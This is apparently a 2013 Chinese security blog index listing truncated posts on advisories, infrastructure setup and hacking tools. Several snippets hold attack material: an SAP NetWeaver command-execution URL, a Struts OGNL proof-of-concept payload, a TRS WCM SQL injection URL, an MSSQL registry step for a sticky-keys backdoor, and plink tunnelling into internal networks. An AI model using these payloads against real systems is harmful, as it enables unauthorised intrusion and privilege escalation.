- 博客(70)
- 资源 (2)
- 收藏
- 关注
原创 sockscap
http://www.networktunnel.net/http://www.networktunnel.net/dwn/socks5capsetup.exe
2013-04-27 17:33:45 1236 1
原创 [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
Author: Janek Vind "waraxe"Date: 25. April 2013Location: Estonia, TartuWeb: http://www.waraxe.us/advisory-103.htmlDescription of vulnerable software:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2013-04-27 14:57:54 875
原创 C语言程序设计自学全套视频教程 C++数据结构 编程
http://item.taobao.com/item.htm?spm=937.1000770.1000419.1.Dpet1P&id=17241266164&asker=wangwang&wwdialog=bbxxbbmc&ad_id=&am_id=&cm_id=&pm_id=
2013-04-26 11:30:07 3419 1
原创 下一代的snort
http://www.openinfosecfoundation.org/index.php/download-suricatahttps://github.com/firnsy/barnyard2
2013-04-24 15:36:44 1168
转载 Resin远程信息泄露漏洞
受影响系统: Caucho Technology Resin v3.1.0 for Windows Caucho Technology Resin v3.0.21 for Windows Caucho Technology Resin v3.0.20 for Windows Caucho Technology Resin v3.0.19 for Windows Cau
2013-04-24 09:33:56 7463
转载 TRS WCM SQL injection
来源http://www.wooyun.org/bugs/wooyun-2013-019753首先是这个页面,好像是越权了http://xxxx/portal/db/dbupdatelog_list.jsp正常应该要登陆才能看吧?直接注入http://xx/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&Page
2013-04-23 11:00:22 1690
原创 hadoop 绑定到IPV4上
可以用netstat -anp |grep myport看本机要启动的服务是否启动到位,经常遇到的情况是地址绑定到ipv6上了,这里两种思路:一是彻底禁用ipv6,而是在hadoop-evn.sh中添加"export HADOOP_OPTS="-Djava.net.preferlIPv4Stack=true"让java程序使用ipv41.jdk2.关闭IPV6打开/et
2013-04-22 21:50:03 1908
原创 sap安全扫描厂家
http://www.esnc.de/esnc-sap-security-audit-software/esnc-security-suite-sap-security-scanner.html
2013-04-22 09:36:53 817
转载 1433映像劫持后门提权
首先:1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)2.服务器的粘滞键功能无损,只要可以正常弹出即可3.服务器未禁止注册表编辑(即写入功能)sql命令读取服务器终端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Serv
2013-04-21 17:45:11 2293
转载 ssh plink 端口转发
动态转发plink -N 222.222.222.222 -D 127.0.0.1:7070远端访问本机plink -N -R 2222:localhost:5080 222.222.222.222穿内网plink -N -L 5900:192.168.222.222:5900 222.222.222.222参考
2013-04-21 16:02:39 3812 1
原创 sap netweaver命令执行漏洞
留了半年还是被放出来了幸好还有一个命令执行没有被暴出来https://XXX/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id
2013-04-21 13:49:28 7156
原创 sap netweaver代码审计
源代码目录e:\usr\sap\EDS\DVEBMGS20\j2ee\cluster\server0\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\
2013-04-21 12:07:46 1052
转载 Lotus Domino Web Administrator – Cross Site Command Execution
DescriptionLotus Domino is vulnerable to CSRF attack which can de used for OS command execution in webadmin.nsf database by using Quick Console.Lotus Domino is an IBM server product that provides
2013-04-21 10:57:47 1333
原创 struts poc
class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.
2013-04-21 08:31:26 10523
转载 Oracle Label Security(Oracle标签安全性)
作者:Darl Kuhn、Steve RoughtonOracle Label Security(Oracle标签安全性)按行来控制用户的访问。绝大多数商业应用程序都必须处理安全性问题。应用程序经常需要限制对专用记录的访问、建立审计跟踪,或者执行一个工作流过程,所有这些都要符合公司的安全策略。构建安全的软件是一个富有挑战性且复杂的工作,在整个机构内管理软件的安全策略可能会更困难。作为模
2013-04-17 17:40:10 2342
转载 Oracle_Label_Security[转]
前言:在Oracle9i中有一个组件称为Oracle Label Security,这个组件实现了基于自定义策略而对数据库中的表甚或是整个Schema提供行级安全性功能。实际上Oracle Label Security是在Oracle8.1.7中提出的,在9i版本中功能得到了大幅度增强。本文通过一个简单的例子对Oracle Label Security的功能作初步的探讨,本文使用的环境是O
2013-04-17 17:39:09 954
转载 [译]Nginx和Lua
这几个月里,我们逐步把Lua集成到Mixlr的前端Nginx配置中。Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。强制搜索引擎只索引mixlr.comGoogle把子域名当作完全独立的网站,我们不希望爬虫
2013-04-17 17:13:02 1542
原创 CSS教程
http://www.dreamdu.com/css/http://www.w3school.com.cn/css/css_intro.asphttp://pan.baidu.com/share/link?shareid=359095&uk=1594331555#dir/path=%2F%E7%BC%96%E7%A8%8B%E4%B9%8B%E9%82%A6%E4%B8%8B%E8%BD%
2013-04-17 10:43:20 656
原创 Partner Webcasts - Oracle Database Security Inside-Out
https://blogs.oracle.com/imc/entry/partner_webcasts_oracle_database_security
2013-04-16 21:08:16 538
原创 go-derper memcached hacking tools
http://research.sensepost.com/tools/servers/go-derper PPT:http://www.slideshare.net/sensepost/cache-on-delivery
2013-04-15 10:11:31 1011
原创 appsec video
https://www.owasp.org/index.php/Category:OWASP_Video#OWASP_AppSecUSA_2012_Conference
2013-04-12 14:02:17 778
转载 Best Practices: Use of Web Application Firewalls
https://www.owasp.org/index.php/Category:OWASP_Best_Practices:_Use_of_Web_Application_Firewalls
2013-04-12 13:59:17 645
转载 strom打造日志处理系统
Storm + Kafka is a very effective log processing solution. A number of users of Storm use this combination, including us at Twitter in a few instances. Kafka gives you a high throughput, reliable way
2013-04-12 11:39:37 1164
转载 storm实时流式计算框架集群搭建过程
http://blog.csdn.net/comaple/article/details/7896167这几天在其他同事的帮助下,调研了twitter的开源流式计算框架storm的使用,下面分享一下storm集群的安装配置过程。以作备忘之用。我的实验机器为:195和196如果转载请注明出处:comaple的博客首先:安装依赖包1, ZeroMQ 2.1.72, JZ
2013-04-12 11:27:15 1514
转载 Twitter Storm 实时数据处理框架分析总结
是Twitter开源的一个类似于Hadoop的实时数据处理框架(原来是由BackType开发,后BackType被Twitter收购,将Storm作为Twitter的实时数据分析)。实时数据处理的应用场景很广泛,如上篇文章介绍S4时所说的个性化搜索广告的会话特征分析。而Yahoo当初创建S4项目的直接业务需求就是为了在搜索引擎的‘cost-per-click’广告中,能根据当前情景上下文(用户偏好
2013-04-12 11:22:17 1023
转载 CentOS6 快速搭建轻量级远程桌面 Xfce & VNC & Firefox
0、系统信息CentOS Linux release 6.0 (Final)Xfce与KDE,Gnome一样,都是可视化的桌面前端,其特点是占用资源更小。根据网上言论,资源占用情况大致为Xfce但我为什么喜欢 xfce 桌面,主要还是因为那只小老鼠,异常可爱啊,还有以前捣鼓 FreeBSD 时都是安装 xfce 桌面的,所以就也习惯都用这个做桌面了,不多说,操作如下:1
2013-04-11 22:26:09 3436
转载 CentOS搭建xfce桌面+VNC教程
Linux的安全与性能向来为开发者所称道,你可以轻松地在搜索引擎中找到各种Linux优越性的说辞,其中不乏Linux的激进者。特别是当你步入VPS领域,更多地接触Linux之后,你会更加觉得这个开源操作系统的强大之处!虽然包括vps驿站在内的许多人已经慢慢开始享受在终端的黑色背景下纯文本的管理VPS,但对于许多人来说,能够在图形界面使用Linux则是另外一种享受。本文将简单带领大家在Linux V
2013-04-11 22:22:34 4361
原创 CEH V7视频下载地址
http://extabit.com/file/2dbhq33z7z6pu/CEHv7_Ryuzin.part01.rarhttp://extabit.com/file/2dbif1z4crhwy/CEHv7_Ryuzin.part02.rarhttp://extabit.com/file/2dbhq33z7z9qa/CEHv7_Ryuzin.part03.rarhttp://exta
2013-04-11 20:59:21 2503
转载 mcafee的mysql audit认证插件的使用
最近在淘宝DBA博客上看到了关于audit plugin插件的使用,所以google到了mcafee的这个项目的官网https://github.com/mcafee/mysql-audit/issues/milestones直接下载了二进制的插件包来使用:下载后将包中的libaudit_plugin.so文件放到mysql的插件目录中.然后根据网站上的说明,加载插件,结果搭线报错
2013-04-11 17:57:33 2689
转载 MySQL 5.6 新增的两个密码安全策略体验
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://yueliangdao0608.blog.51cto.com/397025/1175270 随着MySQL 5.6 的GA, MySQL在一些细节上越来越美。 今天来体验下两个安全验证方面的细节提升。1. mysql_conf
2013-04-11 17:42:01 966
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人